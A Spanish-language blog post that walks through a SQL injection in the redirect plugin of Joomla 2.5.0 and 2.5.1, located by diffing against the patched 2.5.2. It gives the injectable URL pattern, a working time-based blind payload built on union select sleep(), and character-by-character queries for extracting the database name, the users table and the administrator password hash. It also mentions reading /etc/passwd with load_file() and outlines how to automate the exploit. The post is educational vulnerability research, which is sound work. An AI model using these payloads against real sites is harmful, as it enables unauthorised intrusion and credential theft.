Hasta la fecha no hay exploit para este fallo del 29 de febrero, aunque la vulnerabilidad se conoce gracias a la nota de seguridad de Colin Wong.
Lo que me ha dejado completamente K.O., es como una vulnerabilidad tan gorda y estúpida, se ha podido colar en el código. Me ha sorprendido muchísimo que no haya sido descubierta antes, coño, si es que hasta el Acunetix, la detecta.


El primer paso es buscar donde está el bug comparando el código de la versión vulnerable: 2.5.0 ó 2.5.1, con el de la versión que lo soluciona: 2.5.2.
Se descargan ambos ficheros y se descomprimen para ver que líneas han sido modificadas. Afortunadamente no hay demasiadas y es muy sencillo detectar las líneas que están afectadas por el sql injection con un simple comando "diff" (línea 8)


¡Vaya! En las dos últimas líneas del diff se ve que la variable "$current" en la nueva versión es llamada usando $db->quote() y no directamente. Sospechoso ;).
Lo siguiente es tratar de encontrar en que momento este código es ejecutado para averiguar donde se ha de inyectar el código SQL y hasta dónde se puede llegar.
Toca revisar el fichero dónde está esa línea: j-2.5.1/plugins/system/redirect/redirect.php

Tan solo por la cabecera se puede observar que es un componente del Core de Joomla que está encargado de hacer redirecciones y viendo el panel de administración, te haces una rápida idea de que función hace este plugin.

Básicamente permite hacer redirecciones en caso de que solicite una página web que no existe. Gestionando los errores y evitando que un visitante llegue a una página muerta de la web.
Ahora a leer el código del fichero más en detalle y lentamente. Por lo menos la parte más crítica:

Al margen del primer comentario (hay que ver ahora quien es el idiota). En el código se aprecia que la sentencia SQL vulnerable (línea 24) es llamada cuando no existe una redirección publicada y permanente creada para esa página (el if de la línea 18). Es decir, si por ejemplo se solicita la URL: http://localhost/joomla/index.php/AAAAA y el administrador del CMS no ha creado un redirect para esta página, mostrará un error 404 estándar de Joomla.
El siguiente paso que da el aplicativo (de la línea 26 a la 45) es añadir la URL a la base de datos para que el administrador pueda ver que páginas se han solicitado y no existen, pero esta parte es indistinta, ya que la inyección se ha generado antes y por lo tanto es irrelevante.
¿Entonces cómo se explota? Pues tan solo hay que llamar una página del tipo: http://localhost/joomla/index.php/AAAAAA' union select ... y el código que se quiera insertar. Lo sé, parece imposible que un producto tan popular y con esta madurez aún tenga un sql injection TAN estúpido.
"El problema" para hacer uso de la vulnerabilidad es que el resultado de la inyección no es mostrado por pantalla, ni errores, ni resultados positivos/negativos y conseguir algo útil es un poco más complejo, ya que la sentencia vulnerable es usada internamente por el aplicativo y no para generar la página resultante.
Solo queda una alternativa y es hacer inyecciones basadas en tiempo. Es decir, si al solicitar la página no existente tarda 1 segundo en responder normalmente, provocar que tarde 10 según el resultado de la inyección.
El ejemplo más sencillo para detectar esta vulnerabilidad es llamar a la página de la siguiente forma: http://localhost/joomla/index.php/AAAAAA' union select sleep(10) union select '1 y observaríamos que tarda 10 segundos en devolver la página ya que la sentencia SQL vulnerable se quedará 10 segundos esperando e impidiendo la ejecución normal que devolvería la página normalmente en 1 ó 2 segundos.
La ejecución en base de datos y completando la sentencia que se obtiene de la línea 24 con los parámetros que se han pasado, queda de la siguiente forma: select id from tabla where old_url='http://localhost/joomla/index.php/AAAAAA' union select sleep(15) union select '1'
Ahora no queda más remedio que estudiar funciones de MySQL y ver cómo usar este comportamiento, para extraer datos. Las más importantes: database(): devuelve el nombre de la base de datos: select database()
sleep(): ejecuta una demora de tiempo: select sleep(10)
length(): devuelve la longitud de una cadena: select length(database())
ascii(): devuelve el valor ascii de una cadena: select ascii("A")
substring() ó mid(): recorta una cadena de caracteres: select mid(database(),1,1)
load_file(): devuelve el contenido de un fichero: select load_file("/etc/hosts")
ord(): devuelve el código del valor si es multibyte o su ascii: select ord("2")
if(): permite devolver valores en base a los resultados de otras consultas: select if(database()="hola","yes","no") en este caso "no", ya que se llama "joomla" y no "hola"
Mezclando estas funciones se puede llegar al objetivo final. Por ejemplo, en mi base de datos que se llama "joomla":
select substring(database(),1,1) devuelve el primer carácter de "joomla", es decir, la "j".
select ascii(substring(database(),1,1)) devuelve el primer carácter del nombre "joomla", la "j" y luego lo convierte a su decimal ascii: 106
select ascii(substring(database(),2,1)) devuelve el segundo carácter de "joomla", la "o" y luego lo convierte a su decimal ascii: 111
select if(database()="joomla","si","no") comprueba si el resultado de database() es "joomla", en caso de que correcto devuelve "si", en caso de que no sea así devolverá "no".
select if(ascii(substring(database(),2,1))=106,sleep(10),null) comprueba si el decimal ascii del primer carácter de database(), "106", es igual a 106, si es así, ejecuta un sleep de 10 segundos y si no, no devuelve nada.
Lo mejor, verlo en funcionamiento directamente sobre MySQL

Pues después de esto solo queda automatizar todo el proceso del ejemplo 5 para ir recorriendo cadenas de caracteres con substring() y comparar con la tabla ascii, calculando cuánto tarda la web en responder, 10 segundos o tan solo 1 ó 2.

Con estas peticiones se averigua el primer carácter de "database()":

select if ( ascii(substring(database(),1,1))= 1 ,sleep(10),null)
select if ( ascii(substring(database(),1,1))= 2 ,sleep(10),null)
select if ( ascii(substring(database(),1,1))= 3 ,sleep(10),null)
... select if ( ascii(substring(database(),1,1))= 105 ,sleep(10),null)
select if ( ascii(substring(database(),1,1))= 106 ,sleep(10),null) <-- en esta se ejecutará el sleep, ya que el ascii de "j" es 106 y la condición se cumple.

Una vez se detecta el retardo de 10 segundos, se pasa al siguiente carácter, modificando el substring:


select if ( ascii(substring(database(), 2 ,1))=1,sleep(10),null)
select if ( ascii(substring(database(), 2 ,1))=2,sleep(10),null)
select if ( ascii(substring(database(), 2 ,1))=3,sleep(10),null)
...

Anidando un par de bucles y calculando el tiempo se puede sacar el resultado de cualquier consulta sql. Por ejemplo con: select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users" se obtiene el nombre de la tabla donde se almacenan los usuarios y con: select password from zzzz_users limit 1 , el hash de la contraseña del usuario administrador.
Si el usuario que se conecta a la base de datos tiene privilegios suficientes, también podría ejecutar load_file() , cargando un fichero del sistema, que se yo, por ejemplo el /etc/passwd.
El exploit tan solo ha de automatizar este proceso, incluso puede que alguna herramienta ya desarrollada se pueda configurar para este propósito. El funcionamiento incluyendo peticiones tendría este flujo: Se obtiene la fecha del sistema
Se hace petición HTTP GET con la comprobación, por ejemplo: http://localhost/joomla/index.php/AAAAAA' union select if ( ascii(substring(database(), 1 ,1))=1,sleep(10),null) union select '1
Se vuelve a obtener la fecha del sistema
Si la diferencia de tiempo entre el punto 1 y el 3 es de 10 segundos, es que la condición del 'if' se cumple, por lo que se conoce el valor ascii correcto.
Pues eso es todo, ya solo queda optimizar y tirar línas de código que hagan el trabajo sucio.
La optimización pasa por encontrar el menor tiempo posible de espera, reduciendo los 10 segundos que se han usado durante todo el artículo a uno inferior que no genere falsas alarmas. Otra mejora consiste en no hacer tantas peticiones web, evitando recorrer toda la tabla ascii buscando el carácter válido. Para determinadas sentencias, como database(), tan solo consultar desde el decimal 32 al 90.
La última, un poco más compleja consiste en hacer una consulta con ord() y AND para averiguar los bits que compone cada byte. Con tan solo 8 peticiones se averigua el código ascii, pero si calculamos que la mitad de las peticiones tendrán como resultado un sleep(), puede tardar más que hacer hasta las 60 peticiones recorriendo la propia tabla, en la que solo un requiere un único sleep().
¡Fin! Espero que este ejercicio le haya servido a alguien. Este es el código que a mí me ha quedado:


Para los más vagos, un vídeo que espero sea explicativo.

Enlace de este post:
Security by default